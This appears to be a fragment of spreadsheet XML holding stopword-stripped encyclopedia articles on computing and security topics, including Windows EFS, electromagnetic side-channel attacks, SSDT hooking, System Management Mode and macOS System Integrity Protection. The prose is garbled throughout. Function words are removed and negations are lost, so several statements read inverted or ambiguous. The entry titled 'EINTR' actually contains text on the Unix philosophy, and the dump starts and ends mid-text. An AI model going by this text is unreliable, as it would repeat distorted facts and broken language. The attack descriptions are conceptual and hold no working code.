decryption decrypt user's dpapi master dpapi master key: used decrypt user's private key(s) private key: used decrypt file's file encryption (fek): used decrypt/encrypt file's data primary ntfs stream) syskey: used encrypt cached domain verifier password hashes stored supported operating systems windows windows 2000 professional, server, advanced server datacenter editions windows professional, also tablet edition, media center edition edition windows server 2003 windows server 2003 editions windows vista business, enterprise ultimate editions windows professional, enterprise ultimate editions windows server 2008 windows server 2008 windows enterprise editions windows server 2012 windows server 2012 windows pro, enterprise, education editions. windows pro, enterprise, education editions. windows server 2016 windows server 2019 other operating systems operating systems file systems native support efs. features available windows version windows xpencryption client-side cache (offline files database) protection dpapi master backup using domain-wide public autoenrollment user certificates (including certificates) multiple-user (shared) access encrypted files file-by-file basis) revocation checking certificates used sharing encrypted files encrypted files shown alternative color (green default) requirement mandatory recovery agent warning files getting silently decrypted moving unsupported file system password reset disk webdav remote encryption servers delegated active directorywindows sp1support default aes-256 symmetric encryption algorithm efs-encrypted fileswindows 912761prevent enrollment self-signed certificateswindows server 2003digital identity management service enforcement rsakeylength setting enforcing minimum length enrolling self-signed certificateswindows vista windows server 2008per-user encryption client-side cache (offline files) support storing (user dra) private keys pc/sc smart card re-key wizard backup prompts support deriving dpapi master pc/sc smart card support encryption pagefile.sys protection efs-related secrets using bitlocker (enterprise ultimate edition windows vista) group policy controls enforce encryption documents folder offline files encryption indexing encrypted files requiring smart card creating caching-capable user smart card displaying backup notification user created changed specifying certificate template used enrolling certificates automaticallywindows server 2008efs self-signed certificates enrolled windows server 2008 server default 2048-bit length templates (user data recovery agent certificates) default 2048-bit lengthwindows windows server 2008 r2elliptic-curve cryptographic algorithms (ecc). windows supports mixed mode operation algorithms backward compatibility self-signed certificates, using ecc, 256-bit default. configured 1k/2k/4k/8k/16k-bit keys using self-signed certificates, 256/384/521-bit keys using certificates.windows version 1607 windows server 2016add support exfat. algorithms used windows version windows supports range symmetric encryption algorithms, depending version windows files encrypted: also bitlocker data protection disk encryption disk encryption software ecryptfs encfs filesystem-level encryption hardware-based full disk encryption references further reading "implementing encrypting file system windows 2000". windows 2000 evaluated configuration administrators guide. microsoft. retrieved december 2014. bragg, roberta. "the encrypting file system". technet. microsoft. "encrypting file system (windows server 2008, windows vista)". technet. microsoft. february 2009. "encrypting file system windows windows server 2003". technet. microsoft. april 2003. network associates laboratories. "how encrypting file system (windows server 2003, windows professional)". msdn. microsoft. "using encrypting file system". windows resource kit. microsoft. november 2005. "encrypting file system". windows 2000 resource kit. microsoft. "how works". windows 2000 resource kit. microsoft.</t>
  </si>
  <si>
    <t>Dynamic encryption</t>
  </si>
  <si>
    <t>dynamic encryption cryptographic principle enables parties change encryption algorithm every transaction. introduction principle dynamic encryption invented professor lars knudsen technical university denmark. dynamic encryption principle patented. traditional cryptosystems specific cipher chosen thus security system relies frequency changes agreement scheme. dynamic encryption enhance system defining ciphers also cipher changes every data transaction. which follows motivation moving target defense paradigm. order establish encrypted channel using dynamic encryption principle sender receiver first negotiates sender picks cipher large pool ciphers sends together encrypted message. possible construct dynamic encryption system, known ciphers (such aes, des, etc.), encryption algorithms generated system least secure static underlying cipher. details exchanged cryptosystems kept secret, avoid attackers modifying transmitted encryption systems, system transmitted authenticated channel. applications dynamic encryption deployed dencrypt talk, voice communication live-chat application android. dencrypt talk applies principle wrapping standard encryption dynamic layer changed every phone call clients. awards 2017, dencrypt nato's defence innovation challenge award recognition deployment dynamic encryption voice communication. references</t>
  </si>
  <si>
    <t>Encrypted function</t>
  </si>
  <si>
    <t>encrypted function attempt provide mobile code privacy without providing tamper-resistant hardware. method mobile code carry cryptographic primitives even though code executed untrusted environments. autonomously.polynomial rational functions encrypted transformation implemented programs consisting cleartext instructions processor interpreter understands. processor would understand program's function. this field study gaining popularity mobile cryptography. example scenario: host algorithm computes function wants send mobile agent holds input compute f(x). want learn anything scheme: function encrypted results e(f). host creates another program p(e(f)), implements e(f), sends agent. runs agent, computes p(e(f))(x) returns result decrypts f(x). drawbacks: finding appropriate encryption schemes transform arbitrary functions challenge. scheme prevent denial service, replay, experimental extraction others. also homomorphic encryption references thomas sander christian tschudin. protecting mobile agents against malicious hosts. vigna, editor, mobile agents security, volume 1419 lecture notes computer science, pages 44–60. springer-verlag, york, 1998.</t>
  </si>
  <si>
    <t>System image</t>
  </si>
  <si>
    <t>computing, system image serialized copy entire state computer system stored non-volatile form file. system said capable using system images shut later restored exactly state. cases, system images used backup. hibernation example uses image entire machine's ram. disk images system state written disk, system image produced simply copying disk file elsewhere, often disk cloning applications. many systems complete system image cannot created disk cloning program running within system information held outside disks volatile memory, example non-volatile memory like boot roms. process images process image copy given process's state given point time. often used create persistence within otherwise volatile system. common example database management system (dbms). most dbms store state database databases file closed (see database dump). dbms restarted later information database intact proceed though software never stopped. another example would hibernate feature many operating systems. here, state memory stored disk, computer brought energy saving mode, later restored normal operation. some emulators provide facility save image system emulated. video gaming often referred savestate. another code mobility: mobile agent migrate machines state saved, copying data another machine restarting there. programming language support some programming languages provide command take system image program. this normally standard feature smalltalk (inspired flex) lisp, among languages. development languages often quite different many programming languages. example, lisp programmer load packages code running lisp implementation using read-eval-print loop, usually compiles programs. data loaded running lisp system. programmer dump system image, containing pre-compiled possibly customized code—and also loaded application data. often image executable, machines. this system image form executable programs distributed—this method often used programs (such emacs) largely implemented lisp, smalltalk, idiosyncratic languages avoid spending time repeating initialization work every time start similar, lisp machines booted lisp images, called worlds. world contains complete operating system, applications data single file. also possible save incremental worlds, contain changes base world. before saving world, lisp machine operating system could optimize contents memory (better memory layout, compacting data structures, sorting data, ...). although purpose different, "system image" often similar structure core dump. also disk image image external links cryopid process freezer linux</t>
  </si>
  <si>
    <t>Electric gate</t>
  </si>
  <si>
    <t>electric gate type gate opened closed using electrically powered mechanism. electric gate options driveway gate openers rollback (sliding) type retracks gate along fence wall wheels bearing, swing type draws gate open closed hinges. they usually operated remote controller sensor articulated articulated gate openers used gates wide posts allowing opening small spaces. easy system installers simple install aesthetically pleasing motor designs. also known crank operators, main type automation system sold france, aluminium gates often used. underground under-gate jack operators usually control gate directly moving pivot point gate leaf. this makes unit ideal cosmetically also allows degrees leaf swing required. however controlling pivot point gate, like opening door twisting hinge, difficult loads needed point. this highlighted snap, gate change direct, soon can. reason recommend suitable ‘domestic’ systems risk abuse environment. another major consideration under-gate units water immersion/ingress warranty voidance. water table high drainage unit’s foundation inadequate throughout systems life, water ingress unit failure increased. link units usually simpler install maintain, visible otherwise ignorant abuse along gate leaf, also obvious sometimes major, mechanical advantage jacks. therefore, rams suitable multi-user commercial systems. also manual release always ground, making often user friendly operation. sliding space issue driveway behind gates steep incline, better option would sliding gate. sliding gates also popular commercial environment. sliding gates also used cantilever gate systems. electric gate history first electric gates invented canadian fred watson 1881. designed used railway systems. 1884, number american newspapers reported french railway companies adopt electric gate opener. catch connected electro-magnet keeps gate closed,” reported national tribune october 1884. early demonstrations gates united states arranged short-lived toulmin electric railway gate company 1887, baltimore. 19th century, electric gates also used horse racing tracks.the first commercial electric gate systems hydraulic designed reliability ease use. cost hydraulic systems however meant companies started producing affordable electromechanical alternatives. hydraulic motors preferred choice large heavy gates generate high levels torque, electromechanical systems designed lower usage domestic installations produced cost effectively. electric gate motor backbone electric gate, whether automatic not, electric gate motor, distinct motor types exist hydraulic, electromechanical. this electric device actually enables electric gate open close without manually push gate. electric gate safety safety automated gate important consideration, european union, automated gate safety specified series european normalisations. automated gate fitted safety mind potentially become major hazard particularly untrained users. various safety devices available make sure gates meet highest european american safety standards. gate security since electric gates operate slowly, susceptible "tailgating" threats, person vehicle sneaks behind authorized user. security concern, video surveillance camera installed.electric gates alone, however solid imposing cannot guarantee completely secure environment electric locks, often needed boost locking effectiveness gate motors. electric gates recommended used combination security features install full security system. features closed circuits security cameras, additional gates conjunction main gate, electronic keycards keypads, security guards.aside additional security features parking barrier gates, electric security gates often offer safety features like sensors determine obstruction prevent electronic gate swinging vehicle closing somebody's hands. prevent electronic gates damaged irresponsible drivers driving fast speed bumps also commonly placed gate entrances slow vehicles. safety regulations united states electric gate installations must meet underwriters laboratories 325) standard europe installations must meet machinery directive 2006/42/ec en13241-1 regulations concerning gates.the installer gate responsible conformity regulation, manufacturer. main regulations apply 12453 describes safety levels observed installing gate en12445 describes testing method must undertaken.the major points maximum amount force certain test points. example maximum 400n force applied last travel gate, initial impact force must drop 150n within 0.75 second reduce within seconds. during travel gate allowable force 1400n. full risk assessment gates must take place crush, cutting points shown client appropriate protection devices offered, recommended maintenance program also provided. finally installer must confirm electrical equipment fitted european mark time. conform regulations gate system must checked calibrated force tester full results kept technical file years. gate tested comply. most gate kits fitted safety equipment limits achieved cover part en13241-1. september 2010, following incidents bridgend manchester, children killed sliding gates, health safety executive issued safety notices aimed gate manufacturers installers, demanding comply annex 12453:2001 standard. references</t>
  </si>
  <si>
    <t>Electromagnetic attack</t>
  </si>
  <si>
    <t>cryptography, electromagnetic attacks side-channel attacks performed measuring electromagnetic radiation emitted device performing signal analysis these attacks specific type sometimes referred phreaking, intention capture encryption keys. electromagnetic attacks typically non-invasive passive, meaning attacks able performed observing normal functioning target device without causing physical damage. however, attacker better signal less noise depackaging chip collecting signal closer source. these attacks successful cryptographic implementations perform different operations based data currently processed, square-and-multiply implementation rsa. different operations emit different amounts radiation electromagnetic trace encryption show exact operations performed, allowing attacker retrieve full partial private keys. like many side-channel attacks, electromagnetic attacks dependent specific implementation cryptographic protocol algorithm itself. electromagnetic attacks often done conjunction side-channel attacks, like power analysis attacks. background electronic devices emit electromagnetic radiation. because every wire carries current creates magnetic field, electronic devices create small magnetic fields use. these magnetic fields unintentionally reveal information operation device properly designed. because electronic devices affected phenomenon, term ‘device’ refer anything desktop computer, mobile phone, smart card. electromagnetic radiation electromagnetic waves type wave originate charged particles, characterized varying wavelength categorized along electromagnetic spectrum. device uses electricity emit electromagnetic radiation magnetic field created charged particles moving along medium. example, radio waves emitted electricity moving along radio transmitter, even satellite. case electromagnetic side-channel attacks, attackers often looking electromagnetic radiation emitted computing devices, made circuits. electronic circuits consist semiconducting materials upon billions transistors placed. when computer performs computations, encryption, electricity running transistors create magnetic field electromagnetic waves emitted.electromagnetic waves captured using induction coil analog digital converter sample waves given clock rate convert trace digital signal processed computer. electronic device performing computations synced clock running frequencies order mega-hertz (mhz) giga-hertz (ghz). however, hardware pipelining, complexity instructions, operations take multiple clock cycles complete. therefore, always necessary sample signal high clock rate. often possible information operations sampling order kilo-hertz (khz). different devices leak information different frequencies. example, intel's atom processor leak keys encryption frequencies mhz. android version 4.4's bouncy castle library implementation ecdsa vulnerable extraction side channel attacks around range. signal processing every operation performed computer emits electromagnetic radiation different operations emit radiation different frequencies. electromagnetic side-channel attacks, attacker interested frequencies encryption occurring. signal processing responsible isolating frequencies vast multitude extraneous radiation noise. isolate certain frequencies, bandpass filter, blocks frequencies outside given range, must applied electromagnetic trace. sometimes, attacker know frequencies encryption performed case, trace represented spectrogram, help determine frequencies prevalent different points execution. depending device attacked level noise, several filters need applied. attack methods electromagnetic attacks broadly separated simple electromagnetic analysis (sema) attacks differential electromagnetic analysis (dema) attacks. simple electromagnetic analysis simple electromagnetic analysis (sema) attacks, attacker deduces directly observing trace. effective asymmetric cryptography implementations. typically, traces needed, though attacker needs strong understanding cryptographic device implementation cryptographic algorithm. implementation vulnerable sema attacks perform different operation depending whether different amounts power and/or different chip components. this method prevalent many different types side-channel attacks, particular, power analysis attacks. thus, attacker observe entire computation encryption deduce key. example, common attack asymmetric relies fact encryption steps rely value bits. every processed square operation multiplication operation equal attacker clear trace deduce simply observing multiplication operations performed. differential electromagnetic analysis cases, simple electromagnetic analysis possible provide enough information. differential electromagnetic analysis (dema) attacks complex, effective symmetric cryptography implementation, sema attacks not. additionally unlike sema, dema attacks require much knowledge device attacked. known attacks while fact circuits emit high-frequency signals leak secret information known since 1982 nsa, classified 2000, right around time first electromagnetic attack encryption shown researchers. since then, many complex attacks introduced. devices smart cards smart cards, often colloquially referred “chip cards", designed provide secure financial transaction traditional credit card. they contain simple embedded integrated circuits designed perform cryptographic functions. they connect directly card reader provides power necessary perform encrypted financial transaction. many side-channel attacks shown effective smart cards obtain power supply clock directly card reader. tampering card reader, simple collect traces perform side-channel attacks. other works, however, also shown smart cards vulnerable electromagnetic attacks. fpgas field-programmable gate arrays (fpga) commonly used implement cryptographic primitives hardware increase speed. these hardware implementations vulnerable software based primitives. 2005, implementation elliptic curve encryption shown vulnerable sema dema attacks. aria block cipher common primitive implemented fpgas shown leak keys. personal computers contrast smart cards, simple devices performing single function, personal computers many things once. thus, much difficult perform electromagnetic side-channel attacks them, high levels noise fast clock rates. despite issues, researchers 2015 2016 showed attacks laptop using near-field magnetic probe. resulting signal, observed seconds, filtered, amplified, digitized offline extraction. most attacks require expensive, lab-grade equipment, require attacker extremely close victim computer. however, researchers able show attacks using cheaper hardware distances half meter. these attacks, however, required collection traces expensive attacks. smartphones smartphones particular interest electromagnetic side-channel attacks. since advent mobile phone payment systems apple pay, e-commerce systems become increasingly commonplace. likewise, amount research dedicated mobile phone security side channel attacks also increased. currently attacks proofs concept expensive lab-grade signal processing equipment. attacks demonstrated commercial radio receiver could detect mobile phone leakage three meters away.however, attacks using low-end consumer grade equipment also shown successful. using external sound card induction coil salvaged wireless charging pad, researchers able extract user's signing android's openssl apple's commoncrypto implementations ecdsa. examples vulnerable encryption schemes widely used theoretical encryption schemes mathematically secure, type security consider physical implementations, thus, necessarily protect side-channel attacks. therefore, vulnerability lies code itself, specific implementation shown insecure. luckily, many vulnerabilities shown since patched. vulnerable implementations include, definitely limited following: libgcrypt cryptographic library gnupg, implementation ecdh public-key encryption algorithm (since patched) gnupg implementation 4096-bit (since patched) gnupg implementation 3072-bit elgamal (since patched) implementation 1024-bit openssl implementation 1024-bit feasibility attacks described thus mainly focused induction detect unintended radiation. however, far-field communication technologies like radios also used side-channel attacks, although extraction methods far-field signal analysis demonstrated. therefore, rough characterization potential adversaries using attack range highly educated individuals medium funded cartels. following demonstrates possible scenarios: mobile payment systems point sale systems accept payment mobile phones smart cards vulnerable. induction coils hidden systems record financial transactions smart cards mobile phone payments. with keys extracted, malicious attacker could forge card make fraudulent charges private key. belgarric propose scenario mobile payments performed bitcoin transactions. since android implementation bitcoin client uses ecdsa, signing extracted point sale. these types attacks slightly complex magnetic card stripe skimmers currently used traditional magnetic strip cards. wireless charging pads many public venues starbucks locations already offering free public wireless charging pads. previously shown coils used wireless charging used detection unintended radiation. therefore, charging pads pose potential hazard. malicious charging pads might attempt extract keys addition charging user’s phone. when coupled packet sniffing capabilities public wi-fi networks, keys extracted could used perform man-in-the-middle attacks users. far-field attacks discovered, attacker needs point antenna victim perform attacks; victim need actively charging phone public pads. countermeasures several countermeasures electromagnetic attacks proposed, though perfect solution. many following countermeasures make electromagnetic attacks harder, impossible. physical countermeasures effective ways prevent electromagnetic attacks make difficult attacker collect electromagnetic signal physical level. broadly, hardware designer could design encryption hardware reduce signal strength protect chip. circuit wire shielding, faraday cage, effective reducing signal, well filtering signal introducing extraneous noise mask signal. additionally, electromagnetic attacks require attacking equipment close target, distance effective countermeasure. circuit designers also certain glues design components order make difficult impossible depackage chip without destroying recently, white-box modeling utilized develop low-overhead generic circuit-level countermeasure electromagnetic well power side-channel attacks. minimize effects higher-level metal layers acting efficient antennas, idea embed crypto core signature suppression circuit, routed locally within lower-level metal layers, leading towards power electromagnetic side-channel attack immunity. implementation countermeasures many electromagnetic attacks, especially sema attacks, rely asymmetric implementations cryptographic algorithms, effective countermeasure ensure given operation performed given step algorithm gives information value bit. randomization order encryption, process interrupts, clock cycle randomization, effective ways make attacks difficult. usage government classified national security agency program tempest focuses spying systems observing electromagnetic radiation securing equipment protect attacks. federal communications commission outlines rules regulating unintended emissions electronic devices part code federal regulations title provide certification devices produce excess emissions, instead relies self-verification procedure. references</t>
  </si>
  <si>
    <t>Electromagnetic survivability</t>
  </si>
  <si>
    <t>telecommunication, electromagnetic survivability ability system, subsystem, equipment resume functioning without evidence degradation following temporary exposure adverse electromagnetic environment. system, subsystem, equipment performance degraded exposure adverse electromagnetic environment, system experience permanent damage, component burnout, prevent proper operation adverse electromagnetic environment removed. references this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188)</t>
  </si>
  <si>
    <t>System Service Descriptor Table</t>
  </si>
  <si>
    <t>system service descriptor table (ssdt) internal dispatch table within microsoft windows. function ssdt maps syscalls kernel function addresses. when syscall issued user space application, contains service index parameter indicate syscall called. ssdt used resolve address corresponding function within ntoskrnl.exe. modern windows kernels, ssdts used: generic routines (keservicedescriptortable) second (keservicedescriptortableshadow) graphical routines. parameter passed calling userspace application determines ssdt shall used. hooking modification ssdt allows redirect syscalls routines outside kernel. these routines either used hide presence software backdoor allow attackers permanent code execution kernel privileges. reasons, hooking ssdt calls often used technique windows kernel mode rootkits antivirus software.in 2010, many computer security products relied hooking ssdt calls shown vulnerable exploits using race conditions attack products' security checks. also windows native rootkit references</t>
  </si>
  <si>
    <t>System Sensor</t>
  </si>
  <si>
    <t>system sensor company headquartered charles, illinois, dedicated research, development manufacture fire protection equipment. system sensor part honeywell life safety group. history system sensor founded 1984 address requirements exclusive industry fire alarm products. first products mass sounder series notification appliances, came system sensor 1984. shortly after, early 1990s, system sensor came mass sounders, horizontal strobe. 1997, system sensor introduced spectralert, mass discontinued shortly thereafter. november 2006, system sensor discontinued spectralert, replacing spectralert advance, reputation loud highest volume. another notable product line system sensor line wire smoke detectors, first released early 2000s. system sensor acquired honeywell 2000s currently manufactures fire protection devices, flow switches fire suppression systems climate control products. 2017, company announced l-series, claims save energy, installation time, money. series used horn spectralert advance. series hold different covers colored lenses device used fire alarm service. february 2020 system sensor announced discontinued spectralert wall ceiling mount horn strobes horn devices, chimes, chime strobes, replaced series counterparts. remaining spectralert notification appliances outdoor horn strobes. system sensor recently released low-frequency l-series devices. they sounder, however also functionality temporal coding, carbon monoxide (co) operations, like products l-series lineup, version also consumes energy well. distribution partners mircom largest private distribution partner system sensor world. also heat detector first alert insteon references external links official website</t>
  </si>
  <si>
    <t>System Management Mode</t>
  </si>
  <si>
    <t>system management mode (smm, sometimes called ring reference protection rings) operating mode central processor units (cpus) normal execution, including operating system, suspended. alternate software system usually resides computer's firmware, hardware-assisted debugger, executed high privileges. first released intel 386sl. while initially special versions required smm, intel incorporated mainline pentium processors 1993. implemented intel's am386 processors 1991. available later microprocessors architecture.some processors also include management mode, system firmware (such uefi). operation special-purpose operating mode provided handling system-wide functions like power management, system hardware control, proprietary designed code. intended system firmware (bios uefi), applications software general-purpose systems software. main benefit offers distinct easily isolated processor environment operates transparently operating system executive software applications.in order achieve transparency, imposes certain rules. entered (system management interrupt). processor executes code separate address space (smram) made inaccessible operating modes firmware.system management mode address memory huge real mode. x86-64 processors, address memory real address mode. usage initially, system management mode used implementing power management hardware control features like advanced power management (apm). however, bios manufacturers oems relied newer functionality like advanced configuration power interface (acpi).some uses system management mode are: handle system events like memory chipset errors manage system safety functions, shutdown high temperature system management bios (smbios) advanced configuration power interface control power management operations, managing voltage regulator module lpcio (super embedded controller) emulate mouse/keyboard ps/2 mouse/keyboard (often referred legacy support) centralize system configuration, toshiba ibm/lenovo notebook computers managing trusted platform module (tpm) bios-specific hardware control programs, including hotswap thunderbolt hotswap operating system runtimesystem management mode also abused high-privileged rootkits, demonstrated black 2008 2015. entering entered (system management interrupt), invoked motherboard hardware chipset signaling designated smi# processor chip. this signal independent event. software triggered system software access location considered special motherboard logic (port 0b2h common). write location firmware requested processor chip on.by entering smm, processor looks first instruction address smbase (smbase register content) 8000h default 38000h), using registers 3000h 8000h. register value (3000h) real-mode memory addresses processor smm. case, internally appended rightmost end. problems design, operating system cannot override disable smi. fact, target malicious rootkits reside including nsa's "implants", individual code names specific hardware, like souffletrough juniper networks firewalls, schoolmontana j-series routers company, deitybounce dell, ironchef proliant servers.improperly designed insufficiently tested bios code make wrong assumptions work properly interrupting operating modes like 64-bit long mode. according documentation linux kernel, around 2004, buggy implementations legacy support feature common cause crashes, example, motherboards based intel e7505 chipset.since code (smi handler) installed system firmware (bios), code expectations hardware settings incompatible, different ideas advanced programmable interrupt controller (apic) operations take time away applications, operating-system kernel hypervisor, effects magnified multicore processors, since causes cores switch modes. there also overhead involved switching smm, since state must stored memory (smram) write-back caches must flushed. this destroy real-time behavior cause clock ticks lost. windows linux kernels define "smi timeout" setting period within handlers must return control operating system, "hang" "crash". disrupt behavior real-time applications constrained timing requirements. logic analyzer required determine whether entered (checking state smiact# cpu). recovering handler code analyze bugs, vulnerabilities secrets requires logic analyzer disassembly system firmware. also coreboot includes open-source smm/smi handler implementation chipsets intel 80486sl loadall mediagx processor emulates nonexistent hardware ring unified extensible firmware interface (uefi) basic input/output system (bios) references further reading patent 5175853, james kardach; gregory mathews nguyen al., "transparent system interrupt", published 1992-12-29, issued 1992-12-29, assigned intel corporation hammer bios kernel developer's guide, chapter (archived original december 2008) intel ia-32 architectures developer's manual, volume chapter</t>
  </si>
  <si>
    <t>System Integrity Protection</t>
  </si>
  <si>
    <t>system integrity protection (sip, sometimes referred rootless) security feature apple's macos operating system introduced capitan (2015) 10.11). comprises number mechanisms enforced kernel. centerpiece protection system-owned files directories modifications processes without specific "entitlement", even executed root user user root privileges (sudo). apple says root user significant risk factor system's security, especially systems single user account user also administrator. enabled default, disabled. justification apple says system integrity protection necessary step ensure high level security. wwdc developer sessions, apple engineer pierre-olivier martel described unrestricted root access remaining weaknesses system, saying "[any] piece malware password vulnerability away taking full control device". stated installations macos user account necessarily carries administrative credentials means users grant root access program asks whenever user system prompted enters account password martel says often weak non-existent security entire system potentially compromised. restricting power root unprecedented macos. instance, versions macos prior leopard enforce level securelevel, security feature originates derivatives upon macos partially based. functions system integrity protection comprises following mechanisms: protection contents file-system permissions system files directories; protection processes code injection, runtime attachment (like debugging) dtrace; protection unsigned kernel extensions ("kexts").system integrity protection protects system files directories flagged protection. this happens either adding extended file attribute file directory, adding file directory /system/library/sandbox/rootless.conf both. among protected directories are: /system, /bin, /sbin, /usr (but /usr/local). symbolic links /etc, /tmp /var /private/etc, /private/tmp /private/var also protected, although target directories protected. most preinstalled apple applications /applications protected well. kernel, xnu, stops processes without specific entitlements modifying permissions contents flagged files directories also prevents code injection, runtime attachment dtrace respect protected executables.since yosemite, kernel extensions, drivers, code-signed particular apple entitlement. developers request developer entitlement apple. kernel refuses boot unsigned extensions present, showing user prohibition sign instead. this mechanism, called "kext signing", integrated system integrity protection.system integrity protection also sanitize certain environmental variables calling system programs effect. example, sanitize ld_library_path dyld_library_path calling system program like /bin/bash avoid code injections bash process. configuration directories protected default include: /system /sbin /bin /usr /applications/usr protected exception /usr/local subdirectory. /applications protected apps pre-installed calendar, photos, safari, terminal, console, store, notes.system integrity protection disabled (either wholly partly) outside system partition. end, apple provides csrutil command-line utility executed terminal window within recovery system bootable macos installation disk, adds boot argument device's nvram. this applies setting installations capitan macos sierra device. upon installation macos, installer moves unknown components within flagged system directories /library/systemmigration/history/migration-[uuid]/quarantineroot/. preventing write access system directories, system file directory permissions maintained automatically apple software updates. result, permissions repair available disk utility corresponding diskutil operation. reception reception system integrity protection mixed. macworld expressed concern apple could take full control away users developers future releases move security policy macos slowly toward apple's mobile operating system ios, whereupon installation many utilities modifications requires jailbreaking. some applications drivers work full extent cannot operated unless feature disabled, either temporarily permanently. technica suggested could affect smaller developers disproportionately, larger ones able work apple directly. however, also remarked users, including power users, reason turn feature off, saying "almost downsides" also references external links system integrity protection guide apple's developer library</t>
  </si>
  <si>
    <t>EMC NetWorker</t>
  </si>
  <si>
    <t>networker (formerly legato networker) enterprise-level data protection software product dell unifies automates backup tape, disk-based, flash-based storage media across physical virtual environments granular disaster recovery. description cross-platform support provided linux, windows, macos, netware, openvms unix environments. deduplication backup data provided integration dell data domain products. central networker server manages backup clients networker storage nodes access backup media. platforms supported core networker server are: aix, hp-ux pa-risc itanium, linux (fully featured x86, x86-64, itanium, client powerpc macos (client only), solaris sparc x64, irix (client only), tru64 windows. java based networker management console (nmc) software, bundled networker distribution, provides user interface functions client configuration, policy settings, schedules, monitoring, reports, daily operations deduplicated non-deduplicated backups. core networker software backs client file systems operating system environment. add-on database application modules provide backup services products oracle, db2, sap, lotus, informix, sybase, well microsoft exchange server, sharepoint, server. client backup data sent remote networker storage node stored locally attached device dedicated storage node. additionally, networker supports client direct backups allowing clients back directly shared devices bypassing storage node processes. networker snapshot management automates generation point-in-time data snapshots cloning supported storage arrays vnx, xtremio, symmetrix. ndmp module used client-less backups filers like isilon, netapp. vmware virtual machines directly backed either installing networker client virtual machine networker vmware protection perform application consistent image filesystem backups. networker also supports backup recovery microsoft windows server hyper-v virtual servers using volume shadow copy services interface. this support protects parent child partitions (guests) well applications running within virtual machines. history legato systems, inc., original developer networker, founded 1988 four individuals worked together microsystems: kepecs, lyon, moran russell sandberg. networker unix first introduced 1990. company, located palo alto, california, initial public offering july 1995. although relatively modest number million shares, considered run-up dot-com bubble. litigation 2002 alleged legato inflated revenues 1999, restating earnings. networker came acquisition legato october 2003, estimated $1.3 billion. also list backup software references external links networker product page networker faq/wiki networker online community mailing list legato networker commands reference legato networker links</t>
  </si>
  <si>
    <t>ELinOS</t>
  </si>
  <si>
    <t>elinos commercial development environment embedded linux. consists linux distribution target embedded system development tools development host computer. development host computer usually standard desktop computer running linux windows. linux system application software target device created development host. elinos focuses industrial applications. purpose optional extensions linux kernel provided. kernel always specifically compiled embedded system. userspace applications provided precompiled binaries order save time compilation. most elinos software packages open source licensed gpl. elinos provides embedded linux standalone operating system integrated pikeos virtualization platform safety security demands cannot linux alone. latter might case certification according strict industry standard required. eclipse technical basis functionality provided integrated development environment (ide) development host. elinos first published 1999. typical workflow select hardware target embedded system choose provided board support packages (bsp) configure hardware own2. select features wanted target system examples real-time support, remote debugging support, networking functionality choice networking servers3. compile linux kernel based previous steps individual kernel configuration proposed. modified manually.4. generate target's file system image based previous steps contents individual file system proposed. files added removed. dependencies checked resolved automatically.5. deploy file system image target system. result previous step single binary file target device boot6. test analyze software target system using tracing tool monitor system's behavior optimize application system configuration7. debug application software target system using debugger faults debugged using development host supported hardware following processor architectures supported, large board support packages (bsp) various boards: (v7) arm64 (v8) powerpc (32bit 64bit) x86-64symmetric multiprocessing supported multi-core processor used. life überblick references external links sysgo's official site</t>
  </si>
  <si>
    <t>Systancia</t>
  </si>
  <si>
    <t>systancia french software company develops software desktop application virtualisation, cloud computing remote access security solutions. founded 1998 located sausheim, france. systancia acquired ipdiva, security solutions provider 2013.in 2012, systancia received finance french deposits consignments fund (now known bpi), enabling accelerated conditions international development. history systancia's earliest developments date back 1998 view creating types low-cost, multi-processor computers (intel) providing administration remote execution user applications available servers desktops thereby making redundant resources available companies execution usual applications. entered deloitte's 2010 technology fast emea list, ranking fastest growing technology companies emea, ranked number 268. products applidis application desktop virtualization developed systancia, applidis virtualisation software incorporates application desktop virtualization single product, management single console. latest version, applidis fusion released 2015.the application virtualization based microsoft windows terminal services (via remote desktop protocol). desktop virtualization (also called virtual desktop virtual desktop infrastructure) based exchange different hypervisors esx, vmware vcenter, citrix xenserver, microsoft hyper-v server, parallels inc., virtual iron. applidis fusion application transparent, meaning manage virtualise windows applications desktops windows operating system: vista, seven, windows windows windows rds). applidis ezprint printing using centralised environment applidis ezprint (formerly applidis universal printer) universal printing software local remote connection, centralised virtualised architecture) allows administration user print options single printer server. provides compression features reduce size print files application servers local printers. ipdiva secure external access protection, control traceability ipdiva secure security software external access system resources: secure monitored synchronisation smartphones mobiles (activesync mode), secure application system access (vpn portal mode), secure intranet access (reverse proxy mode).ipdiva secure software based distributed architecture: ipdiva server: acts centralised gatekeeper external access requests:single point entry sites hosting systems access published applications, mutual authentication access control, central repository traces remote access. ipdiva gateway: acts interface ipdiva server applications, files systems accessed remotely.the communication secured ipdiva server ipdiva gateway outgoing server, without intervention firewall router place. ipdiva care check record: surveillance video recording ipdiva care security software controls records actions (tse/rdp ssh) carried sensitive servers. references external links systancia official website systancia france website</t>
  </si>
  <si>
    <t>EINTR</t>
  </si>
  <si>
    <t>unix philosophy, originated thompson, cultural norms philosophical approaches minimalist, modular software development. based experience leading developers unix operating system. early unix developers important bringing concepts modularity reusability software engineering practice, spawning "software tools" movement. over time, leading developers unix (and programs established cultural norms developing software; norms became important influential technology unix itself, termed "unix philosophy." unix philosophy emphasizes building simple, compact, clear, modular, extensible code easily maintained repurposed developers creators. unix philosophy favors composability opposed monolithic design. origin unix philosophy documented doug mcilroy bell system technical journal 1978: make program thing well. job, build afresh rather complicate programs adding "features". expect output every program become input another, unknown, program. don't clutter output extraneous information. avoid stringently columnar binary input formats. don't insist interactive input. design build software, even operating systems, tried early, ideally within weeks. don't hesitate throw away clumsy parts rebuild them. tools preference unskilled help lighten programming task, even detour build tools expect throw finished using them.it later summarized peter salus quarter-century unix (1994): write programs thing well. write programs work together. write programs handle text streams, universal interface.in award-winning unix paper 1974, ritchie thompson quote following design considerations: make easy write, test, programs. interactive instead batch processing. economy elegance design size constraints ("salvation suffering"). self-supporting system: unix software maintained unix. unix programming environment preface 1984 book, unix programming environment, brian kernighan pike, bell labs, give brief description unix design unix philosophy: even though unix system introduces number innovative programs techniques, single program idea makes work well. instead, makes effective approach programming, philosophy using computer. although philosophy can't written single sentence, heart idea power system comes relationships among programs programs themselves. many unix programs quite trivial things isolation, but, combined programs, become general useful tools. authors write goal book communicate unix programming philosophy." program design unix environment october 1984, brian kernighan pike published paper called program design unix environment. paper, criticize accretion program options features found newer unix systems 4.2bsd system explain unix philosophy software tools, performing general function: much power unix operating system comes style program design makes programs easy and, important, easy combine programs. this style called software tools, depends programs programming environment used programs designed internally. [...] this style based tools: using programs separately combination done, rather hand, monolithic self-sufficient subsystems, 